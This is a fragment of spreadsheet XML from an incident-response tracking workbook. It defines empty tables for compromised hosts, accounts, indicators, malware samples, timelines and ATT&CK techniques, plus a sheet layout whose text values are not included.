    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0300-000001000000}" name="Hostname" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" totalsRowDxfId="166" dataCellStyle="Normal"/>
    <tableColumn id="20" xr3:uid="{F3E92479-E775-4738-B8D6-13E5413200BF}" name="Date Added" dataDxfId="164" totalsRowDxfId="165" dataCellStyle="Normal"/>
    <tableColumn id="21" xr3:uid="{A6864DFB-E7D1-40C1-ACB7-53DAEFA3E17D}" name="Added by" totalsRowDxfId="163" dataCellStyle="Normal"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0300-000005000000}" name="Domain" totalsRowDxfId="162" dataCellStyle="Normal"/>
    <tableColumn id="22" xr3:uid="{F7396FD7-EE98-4CB5-9B04-0B5AB073BBA5}" name="OS" totalsRowDxfId="161" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0300-000003000000}" name="IPv4 Address" totalsRowDxfId="160" dataCellStyle="Normal"/>
    <tableColumn id="23" xr3:uid="{F3A1EB99-6BF7-468C-8282-DB3EEB3CAE1C}" name="Function" totalsRowDxfId="159" dataCellStyle="Normal"/>
    <tableColumn id="27" xr3:uid="{F1421EDF-3017-4DA1-9A18-19C355CCFDD8}" name="Compromise status" totalsRowDxfId="158" dataCellStyle="Normal"/>
    <tableColumn id="25" xr3:uid="{35C884C2-4537-4E8E-9DBF-961540FBA97E}" name="Evidence Available" dataDxfId="156" totalsRowDxfId="157" dataCellStyle="Normal">
      <calculatedColumnFormula>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="4" xr3:uid="{EF0928D1-FB14-46F6-A4FC-7E4FE5C86756}" name="Analysis Status" dataDxfId="154" totalsRowDxfId="155" dataCellStyle="Normal">
      <calculatedColumnFormula array="1">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="24" xr3:uid="{99C3F117-B45B-40CB-AA10-B810B6C818D2}" name="Reason to be Added" totalsRowDxfId="153" dataCellStyle="Normal"/>
    <tableColumn id="2" xr3:uid="{40099D26-23ED-42C2-AF36-E5C54A99B5CA}" name="Timeline merged to ETS" totalsRowDxfId="152" dataCellStyle="Normal"/>
    <tableColumn id="6" xr3:uid="{BF052367-5BDD-4B87-8E01-DAB21C3AB2D3}" name="Earliest Evidence of Compromise" dataDxfId="150" totalsRowDxfId="151"/>
    <tableColumn id="15" xr3:uid="{00000000-0010-0000-0300-00000F000000}" name="Notes" totalsRowDxfId="149" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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Timeline" displayName="Timeline" ref="A1:P35" totalsRowCount="1" totalsRowDxfId="147" totalsRowBorderDxfId="146" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:P34" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:P18600">
    <sortCondition ref="A1:A18600"/>
  </sortState>
  <tableColumns count="16">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0400-000001000000}" name="Date/Time (UTC)" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" dataDxfId="144" totalsRowDxfId="145" dataCellStyle="Normal"/>
    <tableColumn id="4" xr3:uid="{46D74A36-7B8A-44CE-B1AF-8C798809626C}" name="Notable Event" totalsRowDxfId="143" dataCellStyle="Normal"/>
    <tableColumn id="15" xr3:uid="{10458314-D832-48AE-8C91-EAB84281261C}" name="Added by" totalsRowDxfId="142" dataCellStyle="Normal"/>
    <tableColumn id="14" xr3:uid="{DBB39757-1F51-40A5-A9D3-AF7C8D599A67}" name="Hostname (from evidence)" totalsRowDxfId="141" dataCellStyle="Normal"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0400-000006000000}" name="Src hostname" totalsRowDxfId="140" dataCellStyle="Normal"/>
    <tableColumn id="18" xr3:uid="{590E01DB-110C-49E0-9459-B4E6BB36F1CD}" name="Src Account" totalsRowDxfId="139" dataCellStyle="Normal"/>
    <tableColumn id="12" xr3:uid="{3F4B192B-45AA-4CDD-AFEA-8FB0B47520EE}" name="Dst hostname/IP" totalsRowDxfId="138" dataCellStyle="Normal"/>
    <tableColumn id="13" xr3:uid="{DDDB4E05-E32D-4CE0-8BFB-43EEEA139688}" name="Dst Account" totalsRowDxfId="137" dataCellStyle="Normal"/>
    <tableColumn id="19" xr3:uid="{EEF6192B-DF82-4DE4-804F-61FC96007D5F}" name="Artefact Source" totalsRowDxfId="136"/>
    <tableColumn id="16" xr3:uid="{CB62D8B0-59E5-457E-904A-F5A746A6D81A}" name="Artefact Type" totalsRowDxfId="135"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0400-000008000000}" name="Artefact Details" totalsRowDxfId="134" dataCellStyle="Normal"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0400-000005000000}" name="Description" totalsRowDxfId="133" dataCellStyle="Normal"/>
    <tableColumn id="11" xr3:uid="{E4A4C4F6-1051-4473-A1D1-FD323BD6C547}" name="Notes" totalsRowDxfId="132"/>
    <tableColumn id="7" xr3:uid="{EC5959E4-2148-4A92-90F2-FF3EF5D0BEB3}" name="ATT&amp;CK Tactic" totalsRowDxfId="131"/>
    <tableColumn id="9" xr3:uid="{F6788370-EA62-484B-A301-66C605A53E23}" name="ATT&amp;CK Technique" totalsRowDxfId="130" dataCellStyle="Normal"/>
    <tableColumn id="10" xr3:uid="{0C5832FB-93F7-4132-AE6D-57BE2AE45C75}" name="ATT&amp;CK Subtechnique" totalsRowDxfId="129" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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CompromisedAccounts" displayName="CompromisedAccounts" ref="A1:I24" totalsRowCount="1" totalsRowDxfId="127" totalsRowBorderDxfId="126" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:I23" xr:uid="{00000000-0009-0000-0100-000003000000}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0500-000001000000}" name="Date Added" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" dataDxfId="124" totalsRowDxfId="125" dataCellStyle="Normal"/>
    <tableColumn id="12" xr3:uid="{9DA227E3-1907-4095-B356-718F8C9B6F07}" name="Added by" totalsRowDxfId="123" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0500-000003000000}" name="Account" totalsRowDxfId="122" dataCellStyle="Normal"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0500-000008000000}" name="Type" totalsRowDxfId="121" dataCellStyle="Normal"/>
    <tableColumn id="7" xr3:uid="{A7C42411-C6F8-473D-A027-6E025B85D26A}" name="SID" totalsRowDxfId="120" dataCellStyle="Normal"/>
    <tableColumn id="2" xr3:uid="{31B1583F-BD0A-4BE8-9D6D-E4A87F2143C3}" name="Earliest malicious activity" dataDxfId="118" totalsRowDxfId="119"/>
    <tableColumn id="10" xr3:uid="{00000000-0010-0000-0500-00000A000000}" name="Attacker Created?" totalsRowDxfId="117" dataCellStyle="Normal"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0500-000004000000}" name="Reason to be added" totalsRowDxfId="116" dataCellStyle="Normal"/>
    <tableColumn id="11" xr3:uid="{00000000-0010-0000-0500-00000B000000}" name="Credentials" totalsRowDxfId="115" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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CDD8CAB-CA16-48B0-A3BF-BA4FE95D56FA}" name="IOCs" displayName="IOCs" ref="A1:E29" totalsRowCount="1" totalsRowDxfId="114" totalsRowBorderDxfId="113" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:E28" xr:uid="{1CDD8CAB-CA16-48B0-A3BF-BA4FE95D56FA}"/>
  <tableColumns count="5">
    <tableColumn id="1" xr3:uid="{B1AD9900-499E-4170-9AC1-2BE6D7724CE3}" name="Date added" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" dataDxfId="111" totalsRowDxfId="112" dataCellStyle="Normal"/>
    <tableColumn id="2" xr3:uid="{E6107018-B3C6-42DB-85DF-93920CA2E47F}" name="Added by" totalsRowDxfId="110" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{6E3E6158-9A3C-455F-959E-2E0D448CC01A}" name="Type" totalsRowDxfId="109" dataCellStyle="Normal"/>
    <tableColumn id="4" xr3:uid="{7938ED20-322C-415E-954B-937F9764F2AB}" name="IoC Value" totalsRowDxfId="108" dataCellStyle="Normal"/>
    <tableColumn id="5" xr3:uid="{5AB5B38B-1FB3-4813-9D8F-26E9B130EC96}" name="Notes" totalsRowDxfId="107" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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6000000}" name="MalwareAndTools" displayName="MalwareAndTools" ref="A1:L29" totalsRowCount="1" totalsRowDxfId="102" totalsRowBorderDxfId="101" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:L28" xr:uid="{00000000-0009-0000-0100-000005000000}"/>
  <tableColumns count="12">
    <tableColumn id="18" xr3:uid="{00000000-0010-0000-0600-000012000000}" name="File Name" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" dataDxfId="99" totalsRowDxfId="100" dataCellStyle="Normal"/>
    <tableColumn id="4" xr3:uid="{BD436CFC-D1A8-408E-A7A2-3BF4EF604A0F}" name="Date Added" dataDxfId="97" totalsRowDxfId="98"/>
    <tableColumn id="2" xr3:uid="{C0119DB7-FBB3-4839-9E3C-6F95EFCA2276}" name="Added by" totalsRowDxfId="96" dataCellStyle="Normal"/>
    <tableColumn id="28" xr3:uid="{2FF3344F-45E9-464D-A3C3-5C42F1A698A4}" name="Type" totalsRowDxfId="95" dataCellStyle="Normal"/>
    <tableColumn id="24" xr3:uid="{4500FC77-B057-4DB0-943E-AE27B2AB4A6A}" name="Sample Status" totalsRowDxfId="94" dataCellStyle="Normal"/>
    <tableColumn id="25" xr3:uid="{3F4CEC12-0CC6-4CE7-9315-640403E65A69}" name="RE ticket number" totalsRowDxfId="93" dataCellStyle="Normal"/>
    <tableColumn id="29" xr3:uid="{FC116DD1-FA62-4B1C-9914-BA3D03AC4F59}" name="Description" totalsRowDxfId="92" dataCellStyle="Normal"/>
    <tableColumn id="26" xr3:uid="{41B2BC31-F8D5-4D16-A4F7-27F906D7B551}" name="MD5" totalsRowDxfId="91" dataCellStyle="Normal"/>
    <tableColumn id="27" xr3:uid="{8167A68D-2D87-40DB-B323-4DC8A6C94C4C}" name="SHA1" totalsRowDxfId="90" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{C9D9B849-665B-475E-8A1E-0A30EB7BC403}" name="SHA256" totalsRowDxfId="89"/>
    <tableColumn id="1" xr3:uid="{E291DE3C-65C0-4F1E-9E66-78532361DF07}" name="Full Paths" totalsRowDxfId="88"/>
    <tableColumn id="16" xr3:uid="{00000000-0010-0000-0600-000010000000}" name="System(s)" totalsRowDxfId="87" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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C13CECE-9E00-4C89-B25B-C269D335BA4E}" name="IOCs12" displayName="IOCs12" ref="A1:I29" totalsRowCount="1" totalsRowDxfId="86" totalsRowBorderDxfId="85" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:I28" xr:uid="{1CDD8CAB-CA16-48B0-A3BF-BA4FE95D56FA}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{60BF1552-105C-403C-97E0-33A8BCD238F5}" name="Date" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" dataDxfId="83" totalsRowDxfId="84" dataCellStyle="Normal"/>
    <tableColumn id="2" xr3:uid="{3ED8AFFF-5053-4AA7-898E-CBF32D082809}" name="XFIR Resource" totalsRowDxfId="82" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{752F5FA8-EF36-4C1F-BE11-2F8412990AD9}" name="Description" totalsRowDxfId="81" dataCellStyle="Normal"/>
    <tableColumn id="4" xr3:uid="{0400D5C5-2EA2-4FDD-A290-CB2686C4BE4C}" name="Status" totalsRowDxfId="80" dataCellStyle="Normal"/>
    <tableColumn id="12" xr3:uid="{FEA56347-D3A8-48FB-9C2A-8BB56CB2CC68}" name="Action performed" totalsRowDxfId="79"/>
    <tableColumn id="11" xr3:uid="{66285674-B328-4961-8494-50EC9AABAAAF}" name="Turnover Needed" totalsRowDxfId="78"/>
    <tableColumn id="14" xr3:uid="{CB3EE1A5-10FE-420D-97C0-1B5BE4ADD38C}" name="XFIR Resource 2" totalsRowDxfId="77"/>
    <tableColumn id="13" xr3:uid="{F9E5B005-85FD-447C-AC8C-C04FC04CDCBC}" name="Follow on tasks" totalsRowDxfId="76"/>
    <tableColumn id="10" xr3:uid="{089DD3FB-A70A-47A8-B54B-50C2EF74B069}" name="Final Staus" totalsRowDxfId="75"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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7378C709-290C-4CFB-A0DD-6C7E8D87B3F8}" name="Table38" displayName="Table38" ref="A1:D17" totalsRowCount="1" headerRowDxfId="74" dataDxfId="73" totalsRowDxfId="72" totalsRowBorderDxfId="71">
  <autoFilter ref="A1:D16" xr:uid="{B4FFB1CA-1309-45A0-9AF6-3DF6B44E1B06}"/>
  <tableColumns count="4">
    <tableColumn id="5" xr3:uid="{CC9A894C-4B82-44A9-8CB6-5913A9F735C1}" name="Date Added" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" dataDxfId="69" totalsRowDxfId="70"/>
    <tableColumn id="4" xr3:uid="{29CE16CF-D1DC-4953-A45A-80FC9E074938}" name="Added By" dataDxfId="67" totalsRowDxfId="68"/>
    <tableColumn id="2" xr3:uid="{61B5A5B2-5F17-4BAB-AC94-E6B864FE3D31}" name="Forensic Keywords" dataDxfId="65" totalsRowDxfId="66"/>
    <tableColumn id="3" xr3:uid="{4628EFDC-54B4-41D4-89DC-B2DD91E3A083}" name="Notes" dataDxfId="63" totalsRowDxfId="64" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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950EA1DD-4A46-4712-A1D5-F2F78F0E42B1}" name="Table40" displayName="Table40" ref="A1:L25" totalsRowCount="1" headerRowDxfId="56" dataDxfId="55" totalsRowDxfId="54" totalsRowBorderDxfId="53" headerRowCellStyle="Normal 2" dataCellStyle="Normal 2">
  <autoFilter ref="A1:L24" xr:uid="{56A52364-1ADF-4B54-BE55-6BE8D2099AF5}"/>
  <tableColumns count="12">
    <tableColumn id="1" xr3:uid="{F9CD8272-0827-4248-9AB0-70583AF87577}" name="Date Added" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" dataDxfId="51" totalsRowDxfId="52" dataCellStyle="Normal 2"/>
    <tableColumn id="12" xr3:uid="{DC85C11D-752F-414B-BD84-8E5C34F8B726}" name="Added By" dataDxfId="49" totalsRowDxfId="50" dataCellStyle="Normal 2"/>
    <tableColumn id="2" xr3:uid="{8259D905-5A09-4C98-AF99-E62BD40F6FAF}" name="High Level Task" dataDxfId="47" totalsRowDxfId="48" dataCellStyle="Normal 2"/>
    <tableColumn id="3" xr3:uid="{0209E92D-11A7-4D2D-B63B-66438CB85631}" name="Reason" dataDxfId="45" totalsRowDxfId="46" dataCellStyle="Normal 2"/>
    <tableColumn id="4" xr3:uid="{90F11C8E-0D6F-47E2-9E64-22CB1E0DD483}" name="Owner" dataDxfId="43" totalsRowDxfId="44" dataCellStyle="Normal 2"/>
    <tableColumn id="5" xr3:uid="{D765F847-502A-496C-928F-E351205E5B15}" name="Status" dataDxfId="41" totalsRowDxfId="42" dataCellStyle="Normal 2"/>
    <tableColumn id="6" xr3:uid="{A21C5B9D-B0B5-4CBC-822A-EDD80116B406}" name="Urgency" dataDxfId="39" totalsRowDxfId="40" dataCellStyle="Normal 2"/>
    <tableColumn id="7" xr3:uid="{30E7B1D3-795E-4207-8637-43DBE19FF73F}" name="Effort" dataDxfId="37" totalsRowDxfId="38" dataCellStyle="Normal 2"/>
    <tableColumn id="8" xr3:uid="{3F65C516-B7AC-447B-AAA6-B43AFCA2C718}" name="Shared with" dataDxfId="35" totalsRowDxfId="36" dataCellStyle="Normal 2"/>
    <tableColumn id="9" xr3:uid="{E6C7FCBC-E8F6-42D5-AA19-DF2DE7713D59}" name="Shared when" dataDxfId="33" totalsRowDxfId="34" dataCellStyle="Normal 2"/>
    <tableColumn id="10" xr3:uid="{9D14D48F-AF2C-44CA-8185-C4314FCAF58A}" name="Date Updated" dataDxfId="31" totalsRowDxfId="32" dataCellStyle="Normal 2"/>
    <tableColumn id="11" xr3:uid="{AF9F88A4-C17A-4492-B8F7-2A42D9F2ADF2}" name="Notes" dataDxfId="29" totalsRowDxfId="30" dataCellStyle="Normal 2"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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DataTheft" displayName="DataTheft" ref="A1:H15" totalsRowCount="1" totalsRowDxfId="28" totalsRowBorderDxfId="27" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:H14" xr:uid="{00000000-0009-0000-0100-000009000000}"/>
  <tableColumns count="8">
    <tableColumn id="7" xr3:uid="{0463855C-5996-4C90-A456-91BB56AC04CF}" name="Date Added" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" dataDxfId="25" totalsRowDxfId="26" dataCellStyle="Normal"/>
    <tableColumn id="8" xr3:uid="{DE6B4FFD-5586-479D-B2E0-45031F71CD32}" name="Added By" totalsRowDxfId="24" dataCellStyle="Normal"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0700-000001000000}" name="Date (UTC)" dataDxfId="22" totalsRowDxfId="23" dataCellStyle="Normal"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0700-000002000000}" name="System" totalsRowDxfId="21" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0700-000003000000}" name="Account" totalsRowDxfId="20" dataCellStyle="Normal"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0700-000004000000}" name="File location" totalsRowDxfId="19" dataCellStyle="Normal"/>
    <tableColumn id="9" xr3:uid="{53963422-CE22-40EE-BDD2-2BD5EACDBC24}" name="Size" totalsRowDxfId="18"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0700-000005000000}" name="Description" totalsRowDxfId="17" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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D7B092C-638D-4F97-82DD-30511440A057}" name="MT" displayName="MT" ref="A1:Q553" tableType="queryTable" totalsRowShown="0">
  <tableColumns count="17">
    <tableColumn id="1" xr3:uid="{51116D8F-7B47-4B43-BDAA-2BD9AC93FC35}" uniqueName="1" name="ID" queryTableFieldId="1" dataDxfId="16"/>
    <tableColumn id="2" xr3:uid="{C2AE6809-9EB2-4DE4-A9B7-3CE15FE15E66}" uniqueName="2" name="name" queryTableFieldId="2" dataDxfId="15"/>
    <tableColumn id="3" xr3:uid="{3CA87820-B190-43EF-9C88-B21D977D0CD3}" uniqueName="3" name="description" queryTableFieldId="3" dataDxfId="14"/>
    <tableColumn id="4" xr3:uid="{0672177B-70A8-43A1-80DA-F4AF9D3D86D2}" uniqueName="4" name="url" queryTableFieldId="4" dataDxfId="13"/>
    <tableColumn id="5" xr3:uid="{A1F1D847-D5C4-4F90-9A20-7CD877346993}" uniqueName="5" name="created" queryTableFieldId="5" dataDxfId="12"/>
    <tableColumn id="6" xr3:uid="{63640B5F-2E94-4D39-9AD0-DE95600D8DE9}" uniqueName="6" name="last modified" queryTableFieldId="6" dataDxfId="11"/>
    <tableColumn id="7" xr3:uid="{253F0748-922B-4D6A-A723-A541F52F4971}" uniqueName="7" name="version" queryTableFieldId="7"/>
    <tableColumn id="8" xr3:uid="{6B9EAF1A-F02C-4D39-A652-C5A598502821}" uniqueName="8" name="tactics" queryTableFieldId="8" dataDxfId="10"/>
    <tableColumn id="9" xr3:uid="{696A8242-A01F-47B3-B9C9-118418B6E476}" uniqueName="9" name="detection" queryTableFieldId="9" dataDxfId="9"/>
    <tableColumn id="10" xr3:uid="{9B1F2907-32B1-419D-9821-61631497DAEA}" uniqueName="10" name="platforms" queryTableFieldId="10" dataDxfId="8"/>
    <tableColumn id="11" xr3:uid="{36AA324B-A718-4C7A-AC6F-AC881F09F42F}" uniqueName="11" name="data sources" queryTableFieldId="11" dataDxfId="7"/>
    <tableColumn id="12" xr3:uid="{29F14C7B-FDC6-4394-8B90-C9AFF1530DFF}" uniqueName="12" name="is sub-technique" queryTableFieldId="12"/>
    <tableColumn id="13" xr3:uid="{84630B50-99CA-4771-9DBD-E157E9F1B481}" uniqueName="13" name="sub-technique of" queryTableFieldId="13" dataDxfId="6"/>
    <tableColumn id="14" xr3:uid="{BFBAF9D4-3467-477F-92D6-ACAEB04C0F99}" uniqueName="14" name="contributors" queryTableFieldId="14" dataDxfId="5"/>
    <tableColumn id="15" xr3:uid="{0304A724-860B-4872-B03A-5E6A80D961C0}" uniqueName="15" name="permissions required" queryTableFieldId="15" dataDxfId="4"/>
    <tableColumn id="16" xr3:uid="{DA95AC9A-6573-435B-8B44-2BE0802FF7B7}" uniqueName="16" name="defenses bypassed" queryTableFieldId="16" dataDxfId="3"/>
    <tableColumn id="17" xr3:uid="{515516E9-463D-4738-A8F4-802F0E83E85B}" uniqueName="17" name="supports remote" queryTableFieldId="17"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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D947421-E692-4C11-A4C8-F47C13D7A589}" name="Table10" displayName="Table10" ref="D558:D572" totalsRowShown="0">
  <autoFilter ref="D558:D572" xr:uid="{6D947421-E692-4C11-A4C8-F47C13D7A589}"/>
  <tableColumns count="1">
    <tableColumn id="1" xr3:uid="{0FC7003F-1709-41F3-9BEF-D4EBB5FC2229}" name="Tactic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62FF"/>
  </sheetPr>
  <dimension ref="A1:F42"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="C24" sqref="C24"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="63.59765625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="19.3984375" customWidth="1"/>
    <col min="3" max="3" width="23.19921875" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="18.3984375" customWidth="1"/>
    <col min="5" max="5" width="41.19921875" customWidth="1"/>
    <col min="6" max="6" width="82.19921875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="16.5" thickBot="1">
      <c r="A1" s="41"/>
      <c r="B1" s="5"/>
    </row>
    <row r="2" spans="1:6" ht="16.5" thickBot="1">
      <c r="A2" s="132" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="133"/>
      <c r="C2" s="133"/>
      <c r="D2" s="133"/>
      <c r="E2" s="133"/>
      <c r="F2" s="134"/>
    </row>
    <row r="3" spans="1:6">
      <c r="A3" t="s">
        <v>1</v>
      </c>
      <c r="B3" t="s">
        <v>2</v>
      </c>
      <c r="C3" t="s">
        <v>3</v>
      </c>
      <c r="D3" t="s">
        <v>4</v>
      </c>
      <c r="E3" t="s">
        <v>5</v>
      </c>
      <c r="F3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4" spans="1:6" s="8" customFormat="1">
      <c r="A4" s="8" t="s">
        <v>7</v>
      </c>
      <c r="B4" s="106"/>
      <c r="C4" s="106"/>
      <c r="D4" s="106"/>
    </row>
    <row r="5" spans="1:6">
      <c r="A5" s="105" t="s">
        <v>8</v>
      </c>
      <c r="B5" s="87"/>
      <c r="C5" s="87"/>
      <c r="D5" s="87"/>
    </row>
    <row r="6" spans="1:6" s="8" customFormat="1">
      <c r="A6" s="8" t="s">
        <v>9</v>
      </c>
      <c r="B6" s="106"/>
      <c r="C6" s="106"/>
      <c r="D6" s="106"/>
    </row>
    <row r="7" spans="1:6">
      <c r="A7" s="105" t="s">
        <v>10</v>
      </c>
      <c r="B7" s="87"/>
      <c r="C7" s="87"/>
      <c r="D7" s="87"/>
    </row>
    <row r="8" spans="1:6">
      <c r="A8" s="105" t="s">
        <v>11</v>
      </c>
      <c r="B8" s="87"/>
      <c r="C8" s="87"/>
      <c r="D8" s="87"/>
    </row>
    <row r="9" spans="1:6">
      <c r="A9" s="105" t="s">
        <v>12</v>
      </c>
      <c r="B9" s="87"/>
      <c r="C9" s="87"/>
      <c r="D9" s="87"/>
    </row>
    <row r="10" spans="1:6" ht="16.5" thickBot="1">
      <c r="A10" s="47"/>
      <c r="B10" s="48"/>
      <c r="C10" s="48"/>
      <c r="D10" s="48"/>
      <c r="E10" s="48"/>
      <c r="F10" s="48"/>
    </row>
    <row r="11" spans="1:6" ht="16.5" thickBot="1">
      <c r="A11" s="132" t="s">
        <v>13</v>
      </c>
      <c r="B11" s="135"/>
      <c r="C11" s="135"/>
      <c r="D11" s="135"/>
      <c r="E11" s="136"/>
    </row>
    <row r="12" spans="1:6">
      <c r="A12" t="s">
        <v>14</v>
      </c>
      <c r="B12" t="s">
        <v>15</v>
      </c>
      <c r="C12" t="s">
        <v>16</v>
      </c>
      <c r="D12" t="s">
        <v>17</v>
      </c>
      <c r="E12" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="13" spans="1:6">
      <c r="A13" t="s">
        <v>19</v>
      </c>
      <c r="B13" s="40"/>
    </row>
    <row r="14" spans="1:6">
      <c r="A14" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="15" spans="1:6">
      <c r="A15" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="16.5" thickBot="1">
      <c r="A16" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="17" spans="1:5" ht="16.5" thickBot="1">
      <c r="A17" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B17" s="19"/>
      <c r="C17" s="19"/>
      <c r="D17" s="19"/>
      <c r="E17" s="19"/>
    </row>
    <row r="19" spans="1:5" ht="16.5" thickBot="1"/>
    <row r="20" spans="1:5">
      <c r="A20" s="42" t="s">
        <v>24</v>
      </c>
      <c r="B20" s="45" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="21" spans="1:5">
      <c r="A21" s="43" t="s">
        <v>26</v>
      </c>
      <c r="B21" s="46" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="22" spans="1:5" ht="16.5" thickBot="1">
      <c r="A22" s="44" t="s">
        <v>28</v>
      </c>
      <c r="B22" s="86">
        <v>44711</v>
      </c>
    </row>
    <row r="23" spans="1:5" ht="16.5" thickBot="1">
      <c r="A23" s="101" t="s">
        <v>29</v>
      </c>
      <c r="B23" s="102" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="24" spans="1:5" ht="221.25" thickBot="1">
      <c r="A24" s="131" t="s">
        <v>30</v>
      </c>
      <c r="B24" s="99"/>
    </row>
    <row r="25" spans="1:5" ht="16.5" thickBot="1">
      <c r="A25" s="101" t="s">
        <v>31</v>
      </c>
      <c r="B25" s="102" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="26" spans="1:5" ht="48" thickBot="1">
      <c r="A26" s="108" t="s">
        <v>33</v>
      </c>
      <c r="B26" s="99"/>
    </row>
    <row r="27" spans="1:5" ht="16.5" thickBot="1">
      <c r="A27" s="101" t="s">
        <v>34</v>
      </c>
      <c r="B27" s="102" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="28" spans="1:5" ht="252.75" thickBot="1">
      <c r="A28" s="108" t="s">
        <v>35</v>
      </c>
      <c r="B28" s="99"/>
    </row>
    <row r="29" spans="1:5" ht="16.5" thickBot="1">
      <c r="A29" s="101" t="s">
        <v>36</v>
      </c>
      <c r="B29" s="102" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="30" spans="1:5" ht="221.25" thickBot="1">
      <c r="A30" s="100" t="s">
        <v>37</v>
      </c>
      <c r="B30" s="99"/>
    </row>
    <row r="31" spans="1:5" ht="16.5" thickBot="1">
      <c r="A31" s="101" t="s">
        <v>38</v>
      </c>
      <c r="B31" s="102" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="32" spans="1:5" ht="204.75">
      <c r="A32" s="100" t="s">
        <v>39</v>
      </c>
      <c r="B32" s="99"/>
    </row>
    <row r="42" spans="1:1">
      <c r="A42" s="103" t="s">
        <v>40</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="A11:E11"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="date" operator="greaterThanOrEqual" showErrorMessage="1" errorTitle="Invalid Date Entered" error="You cannot enter a date that precedes today." sqref="B4:D9" xr:uid="{43AB6BFD-468B-4B4C-87F3-B5E9AC3D4235}">
      <formula1>TODAY()</formula1>
    </dataValidation>
